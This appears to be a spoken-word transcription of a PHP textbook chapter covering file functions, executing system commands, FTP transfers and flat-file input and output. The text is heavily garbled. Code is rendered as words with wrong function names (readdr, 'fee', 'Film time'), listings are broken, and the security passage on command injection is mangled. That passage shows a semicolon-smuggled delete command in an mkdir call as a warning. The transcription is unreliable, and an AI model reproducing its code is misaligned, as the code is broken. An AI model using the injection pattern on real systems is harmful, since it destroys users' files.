Chapter 3, PHP and your operating system. In this chapter, manipulating files, using operating system commands on files, transferring files from one machine to another, reading and writing files, swapping data with other programs, using SQLite to store data in text files. His book describes using tools like HTML, PHP, MySQL, and CSS together to develop dynamic web applications. The HTML and CSS provide the presentation and markup of pages, while PHP displays web pages and interacts with MySQL to retrieve and store data for the application. For most web applications, PHP needs to interact only with MySQL. However, a few situations require a web application that's more complex. The web application might need to interact with the operating system or with other software on your system. A photo gallery is one web application that might need to interact with your operating system. Your photo gallery might allow users to upload graphic files into your application. For such an application, you might need to manage the files that the users upload. You might need to rename them, move them, or delete them. You might need to know when the photos were uploaded or when they were last accessed. PHP provides all the features you need to manage your file system, and we help you understand how to do that. PHP also allows you to run any program that's on your computer, regardless of whether it's a PHP program. With PHP code, you can transfer files between computers by using File Transfer Protocol, FTP. You can store information in files other than databases. This chapter gives you the information you need to use PHP to do pretty much anything you can think of on your computer. This chapter also provides information on the security risks inherent in executing operating system commands. The chapter wraps up with a look at managing files. Managing files. The information you save on your hard drive is organized into files, rather than storing files in one big file drawer, making them difficult to find. Files are stored in many drawers, called directories or folders. The system of files and directories is called a file system. A file system is organized in a hierarchical structure, with a top level that is a single directory called root, such as C. On Windows or on Linux or Mac, the root directory contains other directories, and each directory can contain other directories, and so on. The file system structure can go down many levels. A directory is a type of file that you use to organize other files. It contains a list of files and the information needed for the operating system to find those files. A directory can contain both files and other directories. Files can be checked to see if they exist. For example, copied, deleted, and renamed, among other things. Functions for performing these file management tasks are described in the following sections. You also find out about functions that allow you to manage directories and discover what's inside them. In this chapter, we cover the most useful functions for managing files, but more functions are available when you need to perform an action on a file or directory. First, check the online PHP documentation at www.php.net/manual to see whether an existing function does what you need to do. Using a function is preferable if an appropriate function exists. If such a function does not exist, you can use your operating system commands or a program in another language, as described in the Using Operating System Commands section. Later in this chapter, getting information about files. Often you want to know information about a file. PHP has functions that allow you to find out file information from within a script. You can find out whether a file exists with the file underscore exists statement as follows. $result equals file underscore exists stuff.txt. After this statement, $result contains either true or false. The function is often used in a conditional statement, such as the following: if file underscore exists stuff.txt, opening curly bracket, echo file not found, n, closing curly bracket. When you know the file exists, you can find out information about it. Managing files 367. Table 3-1 shows many of the functions that PHP provides for checking files. Some of the information in Table 3-1 is relevant only for Linux, Unix, and Mac, and some is returned on Windows as well. Table 3-1. Functions that get information about a file. Function. What it does. Output is underscore file stuff.txt. Tests whether the file is a regular file rather than a directory or other special type of file. True or false is underscore dir stuff.txt. Tests whether the file is a directory. True or false is underscore executable do.txt. Tests whether the file is executable. True or false is underscore writable stuff.txt. Tests whether you can write to the file. True or false is underscore readable stuff.txt. Tests whether you can read the file. True or false. File time stuff.txt returns the time when the file was last accessed. Unix time stamp like 1,057,196,122. Or false. File time stuff.txt returns the time when the file was created. Unix timestamp or false. Film time stuff.txt returns the time when the file was last modified. Unix timestamp or false. File group stuff.txt returns the group ID of the file. Integer that is a group ID or false. File owner stuff.txt returns the user ID of the owner of the file. Integer that is a user ID or false. File size stuff.txt returns the file size in bytes. Integer or false. File type stuff.txt returns the file type. File type such as file, dir, link, char, or false if error or can't identify type. Base name /t1/do.txt returns the file name from the path do.txt. Dir name /t1/do.txt returns the directory name from the path t1. Managing files. A function that returns useful information about a path file name is pathinfo. You can use the following statement: $pinfo equals pathinfo /topdir/nextdir/stuff.txt. After the statement, $pinfo is an array that contains the following three elements: $pinfo, dir name equals topdir nextdir, $pinfo, base name equals stuff.txt, $pinfo, extension equals txt. When you're testing a file with one of these underscore something functions from Table 3-1, any typing error, such as a misspelling of the file name, gives a false result. For example, is underscore dir time returns false if time is a file, not a directory, but it also returns false if time does not exist. Because you meant to type. Unix timestamps are returned by some of the functions given in Table 3-1. You can convert these timestamps to dates with the date function, as described in Chapter 1 in this mini-book. Copying, renaming, and deleting files. You can copy an existing file into a new file. After copying, you have two copies of the file with two different names. Copying a file is often useful for backing up important files. To copy a file, use the copy statement as follows. Copy file old.txt, file new.txt. This statement copies file old.txt, an existing file, into file new.txt. If a file with the name file new.txt already exists, it's overwritten. If you don't want to overwrite an existing file, you can prevent it by using the following statements. If file underscore exists, file new.txt, opening curly bracket, copy file old.txt, file new.txt, closing curly bracket, else, opening curly bracket, closing curly bracket, echo file already exists. N. You can copy a file into a different directory by using a path name as the destination, as follows. Copy file old.txt, neuter/filenew.txt. Managing files 369. You can rename a file by using the rename statement, as follows. Rename old name.txt, new name.txt. If you attempt to rename a file with the name of a file that already exists, a warning is displayed, as follows, and the file is not renamed. Warning, rename, file old.txt, file new.txt. File exists in C. Test PHP on line 17. To remove an unwanted file, use the unlink statement, as follows. Unlink badfile.txt. After this statement, the file is deleted. If the file doesn't exist to start with, unlink doesn't complain. It acts the same as if it had deleted the file. PHP doesn't let you know if the file doesn't exist, so watch out for typos. Organizing files. Files are organized into directories, also called folders. This section describes how to create and remove directories and how to get a list of the files in a directory. Creating a directory. To create a directory, use the mkdir function, as follows. Mkdir testdir. This statement creates a new directory named testdir in the same directory where the script is located. That is, if the script is test.php, the new directory is testdir. If a directory already exists with the same name, a warning is displayed, as follows, and the new directory is not created. Warning, mkdir file exists in d. test.php on line 5. You can check first to see whether the directory already exists by using the following statements. If is underscore dir, my new dir, opening curly bracket, mkdir, my new dir, closing curly bracket, else, opening curly bracket, echo directory already exists. Quote, after the directory is created, you can organize its contents by copying files into and out of the directory. Copying files is described in the section Copying, Renaming, and Deleting Files earlier in this chapter. To create a directory in another directory, use the entire path name, as follows. mkdir, top.dir, next dir, my new dir. You can use a relative path to create a new directory, as follows. mkdir, my new dir. With this statement, if your script is /topdir/test/makeadir.php, the new directory is top.dir, my new dir. To change to a different directory, use the following statement. chdir, another dir, Building a list of all the files in a directory. Getting a list of the files in a directory is often useful. For example, you might want to provide a list of files for users to download or want to display images from files in a specific directory. PHP provides functions for opening and reading directories. To open a directory, use the opendir statement as follows. $dh equals opendir, top dir test dir. If you attempt to open a directory that doesn't exist, a warning is displayed as follows. Warning, opendir, test dir, failed to open dir, invalid. Argument in test13.php on line 5. In the previous statement, the variable $dh is a directory handle, a pointer to the open directory that you can use later to read from the directory. To read a file name from the directory, use the readdr function as follows. $filename equals readdr, $dh. After this statement, $filename contains the name of a file. Only the file name is stored in $filename, not the entire path to the file. To read all the file names in a directory, you can use a while loop as follows. While $filename equals readdr, $dh, opening curly bracket, echo $filename, n, closing curly bracket, managing files 371. The readdr function doesn't provide any control over the order in which file names are read, so you don't always get the file names in the order you expect. Suppose you want to create an image gallery that displays all the images in a specified directory in a web page. You can use the opendir and readdr functions to do this. Listing 3-to-1 shows a script that creates an image gallery. Listing 3-to-1, a script that creates an image gallery. Less than, PHP, asterisk script name, display gallery, asterisk description, displays all the image files that are, asterisk stored in a specified directory, asterisk, echo less than HTML greater than less than head greater than less than title greater than image gallery less than title greater than less than head greater than less than body greater than $dir equals test1 test dir, $dh equals opendir, $dir, while $filename equals readdr, $dh, opening curly bracket, $filepath equals $dir, $filename, if, is underscore file, $filepath, and arrig.jpg $filename, opening curly bracket, $gallery, equals $filepath, closing curly bracket, sort, $gallery, for each, $gallery as $image, opening curly bracket, echo less than hour greater than, echo less than imgsrc equals $image greater than less than br greater than, closing curly bracket, greater than, less than body greater than less than html greater than, 8, 9, 10, 12, 13, 16, 17. Notice the line numbers at the end of some of the lines in listing 3-to-1. The following discussion of the script and how it works refers to the line numbers. In the script listing 8, 9, this line stores the name of the directory in $dir for use later in the program. Notice that the is included at the end of the directory name. Don't use, even with Windows. This line opens the directory. 10. This line starts a while loop that reads in each file name in the directory. 12. This line creates the variable $filepath, which is the complete path to the file. If the isn't included at the end of the directory name on line 8, $filepath will not be a valid path. 13. This line checks to see whether the file is a graphics file by looking for the .jpg extension. If the file has a .jpg extension, the Complete file path is added to an array called $gallery. 16. This line sorts the array so the images are displayed in alphabetical order. 17. This line starts the for each loop that displays the images in the web page. Using operating system commands. When you need to interact with your operating system, it's always best to use the PHP functions that are provided for this purpose. Using PHP func tions is faster and usually more secure than executing an operating system command directly. However, occasionally PHP doesn't provide a function to perform the task you need. In such cases, you can use PHP features that enable you to execute an operating system command. In this section, we assume that you know the format and use of the system commands for your operating system. Describing operating system commands is outside the scope of this book. If you need to run an operating system command from your PHP script, this section shows you how. PHP allows you to use system commands or run programs in other languages by using any of the following methods. Backticks. PHP executes the system command that is between two backticks and displays the result. System function. This function executes a system command, displays the output, and returns the last line of the output. Exec function. This function executes a system command, stores the output in an array, and returns the last line of the output. Pass-through function. This function executes a system command and displays the output. You can execute any command that you can type into the system prompt. The command is executed exactly as is. You can execute simple commands, ls or dir, rename or mv, or del, though it's more efficient to use the built-in PHP functions for those. As already discussed, if your operating system allows you to pipe or redirect output, you can pipe or redirect in the system command you're executing in PHP. If your operating system allows you to enter two commands on one line, you can put two commands into the single command you're executing from PHP. The following sample commands are valid to execute from PHP, depending on the operating system. dir badfile.txt, dir sort cdc php. dir not valid in Windows, cdc php, and in dir Windows. dir greater than dir file, sort less than unsorted file.txt. On some occasions, you want to run a system command that takes a long time to finish. You can run the system command in the background if your operating system supports such things, while PHP continues with the script. If you do this, you need to redirect the output to a file, rather than return it to the script, so that PHP can continue before the system command finishes. The following sections describe the preceding methods in greater detail. Using backticks. A simple way to execute a system command is to put the command between two backticks, as follows. $result equals dir c. PHP. The variable $result contains the statement's output. In this case, a list of the files in the C PHP directory. If you echo $result, the following output is displayed. Volume in drive C has no label. Volume serial number is 58B2DBD6. Directory of C PHP. The 10th of October 2013, 5:43 p.m. less than dir greater than. The 10th of October 2013, 5:43 p.m. less than dir greater than. The 10th of October 2013, 4:53 p.m. less than dir greater than dev. The 10th of October 2013, 4:53 p.m. less than dir greater than ext. The 10th of October 2013, 4:53 p.m. less than dir greater than extras. using operating system commands. August 30th, 2013, 7:11 a.m. 417,792 FDFTK.dll. August 30th, 2013, 7:11 a.m. 90,112 Freebd.dll. August 30th, 2013, 7:11 a.m. 346,624 GDS32.dll. August 30th, 2013, 7:11 a.m. 90 GoPair.bat. August 30th, 2013, 7:11 a.m. 96,317 Install.txt. August 30th, 2013, 7:11 a.m. 1,097,728 Libby32.dll. August 30th, 2013, 7:11 a.m. 166,912 libmcrypt.dll. August 30th, 2013, 7:11 a.m. 165,643 libmash.dll. August 30th, 2013, 7:11 a.m. 2,035,712 libmysql.dll. August 30th, 2013, 7:11 a.m. 385,024 libswish.dll. August 30th, 2013, 7:11 a.m. 3,286 license.txt. August 30th, 2013, 7:11 a.m. 57,344 msql.dll. August 30th, 2013, 7:11 a.m. 168,858 news.txt. August 30th, 2013, 7:11 a.m. 278,800 ntwdblib.dll. The 10th of October, 2013, 4:53 p.m. less than dir greater than pair. August 30th, 2013, 7:11 a.m. 41,017 phpcgi.x. August 30th, 2013, 7:11 a.m. 32,825 phpwin.x. August 30th, 2013, 7:11 a.m. 32,821 php.x. August 30th, 2013, 7:11 a.m. 2,523 php.gif. August 30th, 2013, 7:11 a.m. 46,311 php.ini.dist. August 30th, 2013, 7:11 a.m. 49,953 php.ini recommended. August 30th, 2013, 7:11 a.m. 36,924 php5 apache.dll. August 30th, 2013, 7:11 a.m. 36,925 php5 apache2.dll. August 30th, 2013, 7:11 a.m. 36,927 php5 apache2_2.dll. August 30th, 2013, 7:11 a.m. 36,932 php5 apache2_filter.dll. August 30th, 2013, 7:11 a.m. 57,410 php5 apache_hooks.dll. August 30th, 2013, 7:11 a.m. 669,318 php5 embed.lib. August 30th, 2013, 7:11 a.m. 28,731 php5 asapi.dll. August 30th, 2013, 7:11 a.m. 28,731 php5 nsapi.dll. August 30th, 2013, 7:11 a.m. 4,796,472 php5 ts.dll. August 30th, 2013, 7:11 a.m. 86,076 php_MySQL.dll. August 30th, 2013, 7:11 a.m. 135 pws php5 cgi.reg. August 30th, 2013 7:11 a.m. 139 PWS PHP 5 asapi.reg. August 30th, 2013 7:11 a.m. 1830 snapshot.txt. August 30th, 2013 7:11 a.m. 200,704 ssleay32.dll. 35 file s 11,569,880 bytes. 6 dir s 180,664,549,376 bytes free. The backtick operator is disabled when safe_mode is enabled. On some systems, safe_mode is set to off by default when PHP is installed. On other systems, safe_mode is set to on. The system administrator can change this value using the system function. The system function executes a system command, displays the output, and returns the last line of the output from the system command. To execute a system command, use the following statement: $result equals system dir c php. Using operating system commands 375. When this statement executes, the directory listing is displayed, and $result contains the last line that was output from the command. If you echo $result, you see something like the following: 11 dir s 566,263,808 bytes free. The contents of $result with the system function is the last line of the output from the dir command. Using the exec function, the exec function executes a system command but doesn't display the output. Instead, the output can be stored in an array, with each line of the output becoming an element in the array. The last line of the output is returned. Perhaps you just want to know how many files and free bytes are in a directory. With the following statement, you execute a command without saving the output in an array. $result equals exec dir c php. The command executes, but the output isn't displayed. The variable $result contains the last line of the output. If you echo $result, the display looks something like this: 11 dir s 566,263,808 bytes free. The output is the last line of the output of the dir command. If you want to store the entire output from the dir command in an array, use the following command: $result equals exec dir c php $dirroot. After this statement, the array $dirroot contains the directory listing with one line per item. You can display the directory listing as follows. For each $dirroot as $line, opening curly bracket, echo $line n, closing curly bracket. The loop displays the following. Volume in drive C has no label. Volume serial number is 394E15E5. Using operating system commands. The 10th of October 2013 5:43 p.m. less than dir greater than. The 10th of October 2013 5:43 p.m. less than dir greater than. The 10th of October 2013 4:53 p.m. less than dir greater than dev. The 10th of October 2013 4:53 p.m. less than dir greater than ext. The 10th of October 2013 4:53 p.m. less than dir greater than extras. August 30th 2013 7:11 a.m. 417,792 fdftk.dll. You can also use the following statements to get specific elements from the output array. Echo $dirroot 3. Echo $dirroot 7. The output is as follows. Directory of C. PHP. The 10th of October 2013 4:53 p.m. less than dir greater than dev. Using the pass-through function. The pass-through function executes a system command and displays the output exactly as it is returned. To execute a system command, use the following statement. Pass-through dir c php. The statement displays the directory listing but doesn't return anything. Therefore, you don't use a variable to store the return data. The output is displayed in raw form. It isn't processed. Therefore, this function can be used when binary output is expected. Accessing error messages from system commands. The methods for executing system commands do not display or return an informational error message when the system command fails. You know, the system command didn't work because you didn't get the outcome you expected. But because the functions don't return error messages, you don't know what went wrong. You can return or display the operating system error message by adding a few extra characters to the system command you're executing. On most operating systems, if you add the characters 2 greater than and 1 after the system command, the error message is sent to wherever the output is directed. For example, you can use the following statement. $result equals system DC PHP. Using operating system commands 377. The system function displays the directory when the system command executes. However, notice that dir is mistyped. It is d rather than dir. No system command called d exists, so the system command can't execute, and nothing is displayed. Suppose you use the following statement instead. $result equals system DC PHP 2 greater than and 1. In this case, the error message is displayed. On Windows, the error message displayed is as follows. D is not recognized as an internal or external command, operable program or batch file. Be sure you don't include any spaces in 2 greater than and 1. The format requires the char actors together, without any spaces. Understanding security issues. When you execute a system command, you allow a user to perform an action on your computer. If the system command is dir c php, that's okay. However, if the system command is bin * or del c *, you won't be happy with the results. You need to be careful when using the functions that execute system commands outside your script. As long as you execute only commands that you write yourself, such as dir or ls, you're okay. But when you start executing commands that include data sent by users, you need to be extremely careful. For example, suppose you have an application in which users type a name into a form and your application then creates a directory with the name sent by the user. The user types Smith into the form field named directory name. Your script that processes the form has a command as follows. $directory name equals $_post. Directory name exec mkdir $directory name. Because $directory name equals Smith, mkdir Smith is the system command that is executed. The directory is created, and everybody is happy. However, suppose the user types Smith into the form. In this case, $directory name equals Smith the system command that executes is now mkdir Smith On many operating systems, such as Unix and Linux, the semicolon character separates 2 commands so that 2 commands can be entered on one line. Oops! The commands are executed as follows. mkdir Smith using FTP. Now you have a problem. The directory Smith is created, and all the files in the current directory are removed. If you use a variable in a system command, you must use it carefully. You must know where it came from. If it comes from outside the script, you need to check the value in the variable before using it. In the preceding example, you could add code so the script checks the variable to be sure it contains only letters and numbers before using it in the mkdir command. Chapter 2. In this mini-book describes how to use an if statement to perform such checks. Using FTP, transferring files from one computer to another happens a gazillion times a day on the internet, when colleagues on opposite sides of the country need to share files. It isn't a problem. A quick transfer takes only seconds, and all parties have the files they need. File Transfer Protocol, FTP, is a common way to transfer files from one computer to another. FTP allows you to get a directory listing from another computer or to download or upload a single file or several files at once. FTP is client-server software. To use FTP to transfer files between your computer and a remote computer, you connect to an FTP server on the remote computer and send it requests. It's worth noting that FTP is inherently insecure, and not in a way that therapy will help. When you use FTP, your username, password, and the files themselves are passed over the network without encryption. This means that someone with enough knowledge and access to your network could sniff the username and password. If you're looking for a more secure method for transferring files, look to the SCP or SFTP commands. That said, FTP is still in wide use, especially for hosting providers. To use FTP in your scripts, FTP support needs to be enabled when PHP is installed. If you installed PHP for Windows, you don't need to do anything extra to enable FTP support. If you're compiling PHP on Unix, Linux, or Mac, and you want to enable FTP support, you can use the FTP support installation option as follows. Enable FTP. In this section, we tell you what you need to know about logging into your FTP server, accessing a directory listing, transferring files to and from the FTP server, and using various functions to accomplish FTP-related tasks. Using FTP 379, logging into the FTP server. To connect to the FTP server on the computer you want to exchange files with, use the FTP_connect function as follows. $connect equals FTP_connect, janet.valade.com. Or, you can connect by using an IP address as follows. $connect equals FTP_connect, 172.17.204.2. After you connect, you must log in to the FTP server. You need a user ID and a password to log in. You might have your own personal ID and password, or you might be using a general ID and password that anyone can use. Some public sites on the internet let anyone log in by using the user ID of anonymous and the user's email address as the password. It's best for security to put the user ID and password into a separate file and to include the file when needed. The FTP_login function enables you to log in to an FTP server after you've made the connection. This statement assumes you have your account ID and password stored in variables as follows. $login_result equals FTP_login. $connect, $user ID, $password. If you try to log in without establishing a connection to the FTP server first, you see the following warning. Warning: FTP_login expects parameter 1 to be resource boolean given in D test1 test13.php on line 9. The warning doesn't stop the program. The login fails, but the script continues, which probably isn't what you want. because the rest of your script probably depends on your successful FTP connection. You might want to stop the script if the functions fail. The following statements stop the script. If the function fails, $connect equals FTP_connect. Janet.valade.com. Or die. Can't connect to server. $login_result equals FTP_login. $connect. $user ID. $password. Or die. Can't log into server. After you log in to the FTP server, you can send it requests to accomplish tasks, such as getting a directory listing or uploading and downloading files, as described in the following sections. Using FTP. Getting a directory listing. One common task is to get a directory listing. The FTP_nlist statement gets a directory listing from the remote computer and stores it in an array as follows. $files are equals FTP_nlist. $connect, data. The second parameter in the parentheses is the name of the directory. If you don't know the name of the directory, you can request the FTP server to send you the name of the current directory as follows. $directory_name equals FTP_pwd. $connect. $files are equals FTP_nlist. $connect. $directory_name. The directory listing that FTP sends after the FTP_nlist statement runs is stored in an array. One file name in each element of the array. You can then display the directory listing from the array as follows. For each $files are as $value. Opening curly bracket. Echo $value n. Closing curly bracket. Downloading and uploading files with FTP. You can download a file from the remote computer with the FTP_get func. on. The following statement downloads a file from the remote computer after you're logged into the FTP server. FTP_get. $connect. New file.txt. Data.txt. FTP_ASCII. The first file name, new file.txt, is the name the file will have on your computer after it's downloaded. The second file name, data.txt, is the existing name of the file that you want to download. The FTP_ASCII term in the statement tells FTP what kind of file is being downloaded. Here are the choices for file mode. FTP_ASCII. These are text files. FTP_binary. Machine language files. Basically anything that isn't plain text. You can determine which file mode you need by examining the contents of the file. If the contents are characters that you can read and understand, the file is ASCII. If the contents appear to be garbage, the file is binary. Graphic files, for example, are binary. Using FTP 381, you can upload a file with a similar function called FTP_put. The following statement uploads a file. FTP_put. $connect. New file.txt. Data.txt. FTP_ASCII. The first file name, new file.txt, is the name the file will have on the remote computer after it's uploaded. The second file name, data.txt, is the existing name of the file that you want to upload. When you're finished transferring files over your FTP connection, you can close the connection with the following statement. FTP_close. $connect. The script in listing 3-2 downloads all the files in a directory that have a .txt extension. The files are downloaded from the remote computer over an FTP connection. Listing 3-2, a script to download files via FTP. PHP ** script name. Download files ** description. Downloads all the files with a.txt asterisk extension in a directory via FTP. Asterisk. Include FTP stuff.inc. $dir_name equals data. $connect equals FTP_connect. $server name. $die. Can't connect to FTP server. $login_result equals FTP_login. $connect. $user ID. $password. $die. Can't log in. $files are equals FTP_nlist. $connect. $dir_name. For each. $files are as $value. Opening curly bracket. If. preg_match. hash.txt $value. Opening curly bracket. If. file_exists. $value. Opening curly bracket. FTP_get. $connect. $value. $dir_name. $value. FTP_ASCII. Closing curly bracket. Else. Opening curly bracket. Echo file $value already exists. N. Closing curly bracket. Closing curly bracket. Closing curly bracket. FTP_close. $connect. Greater than. Book 4. Chapter 3. PHP and your operating system. 382. Using FTP. The script gets a directory listing from the remote computer and stores it in. $files are. The for each statement loops through the file names in $files. Arranged by and checks to see whether each file has a .txt extension. When a file has a .txt extension, the script tests to see whether a file with the same name already exists on the local computer. If a file with that name doesn't already exist, the file is downloaded. If such a file does exist, a message is printed, and the file isn't downloaded. The script in listing 3-2 includes a file named ftpstuff.inc. This file contains the information needed to connect to the server with FTP. The ftpstuff.inc file contains code similar to the following. Less than PHP $server name equals your server. $user ID equals your userid. $password equals your password. Greater than. Looking at other FTP functions. Additional FTP functions perform other actions, such as change to another directory on the remote computer or create a new directory on the remote computer. Table 3-2 contains most of the FTP functions that are available. Table 3-2. FTP functions. Function. What it does. FTP_CDUP. $connect. Changes to the directory directly above the current directory. FTP_CHDIR. $connect. Directory name. Changes directories on the remote computer. FTP_close. $connect. Closes an FTP connection. FTP_connect. Server name. Opens a connection to the computer. Server name can be a domain name or an IP address. FTP_delete. $connect. Path. File name. Deletes a file on the remote computer. FTP_exec. $connect. Command. Executes a system command on the remote computer. FTP_FGET. $connect. $fh. Data. txt FTP_ASCII. Downloads the file contents from the remote computer into an open file. $fh is the file handle of the open file function. What it does. FTP_FPUT. $connect. New. txt $fh. FTP_ASCII. Uploads an open file to the remote computer. $fh is the file handle of the open file. FTP_get. $connect. D. txt srtxt ftp_ASCII. Downloads a file from the remote computer. srtxt is the name of the file to be downloaded, and d.txt is the name of the downloaded file. ftp_login, $connect, $user ID, $password, logs into the FTP server. ftp_mdtm, $connect, filename.txt, gets the time when the file was last modified. ftp_mkdir, $connect, directory name, creates a new directory on the remote computer. ftp_nlist, $connect, directory name, gets a list of the files in a remote directory. Files are returned in an array. ftp_put, $connect, d, txt srtxt ftp_ASCII. Uploads a file to the remote computer. srtxt is the name of the file to be uploaded, and d.txt is the file name on the remote computer. ftp_pwd, $connect, gets the name of the current directory on the remote computer. ftp_rename, $connect, oldna, me, new name, renames a file on the remote computer. ftp_rmdir, $connect, directory name, deletes a directory on the remote computer. ftp_size, $connect, file name, txt, returns the size of the file on the remote computer. ftp_systype, $connect, returns the system type of the remote file server. For example, Unix, reading and writing files. This book includes information about using PHP and MySQL together. In most applications, you store the data needed by the application in a MySQL database. However, occasionally you need to read or write information in a text file that isn't a database. This section describes how to read and write data in a text file, also called a flat file. Reading and writing files. You use PHP statements to read from or write to a flat file. Using a flat file requires 3 steps. 1. Open the file. 2. Write data into the file or retrieve data from the file. 3. Close the file. These steps are discussed in detail in the following sections. Accessing files. The first step, before you can write information into or read information from a file, is to open the file. The following is the general format for the statement that opens a file. $fh equals fopen. File name, mode. The variable $fh, referred to as a file handle, is used in the statements that write data to or read data from the open file so that PHP knows which file to write into or read from. The $fh variable contains the information that identifies the location of the open file. You use a mode when you open the file to let PHP know what you intend to do with the file. Table 3-3 shows the modes you can use. Table 3-3. Modes for opening a file. Mode. What it does. What happens when the file doesn't exist. R. Read only. A warning message is displayed. R+. Reading and writing. A warning message is displayed. W. Write only. PHP attempts to create it. If the file exists, PHP overwrites it. W+. Reading and writing. PHP attempts to create it. If the file exists, PHP overwrites it. A. Append data at the end of the file. PHP attempts to create it. A+. Reading and appending. PHP attempts to create it. The file name can be a simple file name. Filename.txt. A path to the file. C/data/filename.txt. Or a URL. http://yoursite.com. Filename.txt. Opening files in read mode. You can open the file file1.txt to read the information in the file with the following statement: $fh equals fopen file1.txt r. Based on this statement, PHP looks for file1.txt in the current directory, which is the directory where your PHP script is located. If the file can't be found, a warning message, similar to the following, might or might not be displayed, depending on the error level set, as described in Chapter 1 of this mini-book. Warning: fopen file1.txt failed to open stream. No such file or directory in D. test2.php on line 15. Remember, a warning condition doesn't stop the script. The script continues to run, but the file doesn't open. So any later statements that read or write to the file aren't executed. You probably want the script to stop if the file can't be opened. You need to do this yourself with a die statement, as follows: $fh equals fopen file1.txt r. Our die can't open file. The die statement stops the script and displays the specified message. Opening files in write mode. You can open a file in a specified directory to store information by using the following type of statement: $fh equals fopen c/tester/file1.txt w. If the file doesn't exist, it is created in the indicated directory. However, if the directory doesn't exist, the directory isn't created, and a warning is displayed. You must create the directory before you try to write a file into the directory. You can check whether a directory exists before you try to write a file into it by using the following statements: if is _dir c tester opening curly bracket $fh equals fopen c/tester/file1.txt w closing curly bracket. With these statements, the fopen statement is executed only if the path file name exists and is a directory. Opening files on another website. You can also open a file on another website by using a statement such as the following: $fh equals fopen http janet.valade.com/index.html r. You can use a URL only with a read mode, not with a write mode, and there are better ways to do this, namely the curl functions. See the PHP manual at http://php.net/manual/n/book.curl.php for more info. Mashing on the curl functions. Closing a file. To close a file after you have finished reading or writing it, use the following statement: fclose $fh. In this statement, $fh is the file handle variable you created when you opened the file. Writing to a file. After you open the file, you can write into it by using the fwrite statement, which has the following general format: fwrite $fh datatosave. In this statement, $fh is the file handle that you created when you opened the file containing the pointer to the open file, and datatosave is the information to be stored in the file. The information can be a string or a variable. For example, you can use the following statements: $today equals date, ymd, $fh equals fopen, file2.txt a, fwrite, $fh, $today, n, fclose, $fh. These statements store the current date in a file called file2.txt. Notice that the file is opened in append mode. If the file doesn't exist, it is created, and the date is written as the first line. If the file exists, the date is added to the end of the file. In this way, you create a log file that stores a list of the dates on which the script is run. The fwrite statement stores exactly what you send after the fwrite statement executes twice. File2.txt contains the 22nd of October 2013. The 22nd of October 2013. The dates appear on separate lines because the new line character N is written to the file. Be sure to open the file with the mode if you want to add information to a file. If you use a write mode, the file is overwritten each time it's opened. Reading from a file. You can read from a file by using the fgets statement, which has the following general format: $line equals fgets $fh. In this statement, $fh holds the pointer to the open file. This statement reads a string until it encounters the end of the line or the end of the file, whichever comes first, and stores the string in $line. To read an entire file, you keep reading lines until you get to the end of the file. PHP recognizes the end of the file and provides a function fee to tell you when you reach the end of the file. The following statements read and display all the lines in the file. While fee $fh opening curly bracket $line equals fgets $fh echo $line closing curly bracket. In the first line, fee $fh returns true when the end of the file is reached. The exclamation point negates the condition being tested, so that the while statement continues to run as long as the end of the file isn't reached. When the end of the file is reached, while stops. If you use these statements to read the log file created in the preceding section, you get the following output. The 22nd of October 2013. The 22nd of October 2013. As you can see, the new line character is included when the line is read. In some cases, you don't want the end of line included. If so, you need to remove it by using the following statements. While fee $fh opening curly bracket $line equals rtrim fgets $fh echo $line closing curly bracket. The rtrim function removes any trailing blank spaces in the new line character. The output from these statements is as follows: 2013102220131022. Reading files piece by piece. Sometimes you want to read strings of a certain size from a file. You can tell fgets to read a certain number of characters by using the following format. $line equals fgets $fh n. This statement tells PHP to read a string that is n1 characters long until it reaches the end of the line or the end of the file. For example, you can use the following statements. While fee $fh opening curly bracket $char4 equals fgets $fh 5 echo $char4 n closing curly bracket. These statements read each 4-character string until the end of the file. The output is as follows: 2013 to 10, 22, 2013 to 10, 22. Notice that there's a new line at the end of each line of the file. Reading a file into an array. It's often handy to have the entire file in an array. You can do that with the following statements. $fh equals fopen file2.txt r. While fee $fh opening curly bracket $content equals fgets $fh closing curly bracket f close $fh. The result is the array $content with each line of the file as an element of the array. The array keys are numbers. PHP provides a shortcut function for opening a file and reading the entire contents into an array. one line in each element of the array. The following statement produces the same results as the preceding 5 lines. $content equals file, file2.txt. The statement opens file2.txt, puts each line into an element of the array, $content, and then closes the file. The file function can slow down your script if the file you're opening is really large. How large depends on the amount of available computer memory. If your script seems slow, try reading the file with fgets rather than file and see whether that speeds up the script. You can direct the file function to automatically open files in your include directory, described in Chapter 2 of this mini-book, by using the following statement: $content equals file, file2.txt, 1. The 1 tells PHP to look for file2.txt in the include directory rather than in the current directory. Reading a file into a string. Sometimes putting the entire contents of a file into one long string can be useful. For example, you might want to send the file contents in an email message. PHP provides a function for reading a file into a string as follows: $content equals file underscore get underscore contents, file2.txt, 1. The file underscore get underscore contents function works the same as the file function, except that it puts the entire contents of the file into a string rather than an array. After this statement, you can echo $content as follows: echo $content. The output is the following: the 22nd of October 2013. The 22nd of October 2013. The output appears on separate lines because the end-of-line characters are read and stored as part of the string. Thus, when you echo the string, you also echo the end-of-line characters, which start a new line. The file underscore get underscore contents function was introduced in version 4.3.0. It isn't available in older versions of PHP. 390. Exchanging data with other programs. Exchanging data with other programs. You might sometimes need to provide information to other programs or read information into PHP from other programs. Flat files are particularly useful for such a task, and we explain how to perform that kind of task here. Exchanging data in flat files. Almost all software has the capability to read information from flat files or write information into flat files. For example, by default, your word processor saves your documents in its own format, which only the word processor can understand. However, you can choose to save the document in text format. Instead, the text document is a flat file containing text that can be read by other software. Your word processor can also read text files, even ones that were written by other software. When your PHP script saves information into a text file, the information can be read by any software that has the capability to read text files. For example, text files can be read by most word processing software. However, some software requires a specific format in the text file. For example, an address book software application might read data from a flat file but require the information to be in specified locations. For example, the first 20 characters in a line are read as the name. The next 20 characters are read as the street address, and so on. You need to know what format the software requires in a flat file. Then write the flat file in the correct format in your PHP script by using fwrite statements, as discussed in the section Writing to a File. Earlier in this chapter, exchanging data in comma-delimited format, a comma-separated values, CSV, file, also called a comma-delimited file, is a common format used to transfer information between software programs. Understanding comma-delimited format. A CSV file is used to transfer information that can be structured as a table, organized as rows and columns. For example, spreadsheet programs organize data as rows and columns and can read and write CSV files. A CSV file is also often used to transfer data between different database software, such as between MySQL and Microsoft Access. Many other software programs can read and write data in CSV files. A CSV file is organized with each row of the table on a separate line in the file, and the columns in the row are separated by commas. For example, an address book can be organized as a CSV file as follows: John Smith, 1234 Oak Street, Big City, Oregon, 99999. Mary Jones, 5678 Pine Street, Bigger City, Maine, 11111. Luis Rojas, 1234 Elm Street, Biggest City, Texas, 88888. Exchanging data with other programs 391. Excel can read this file into a table with 5 columns. The comma signals the end of one column and the 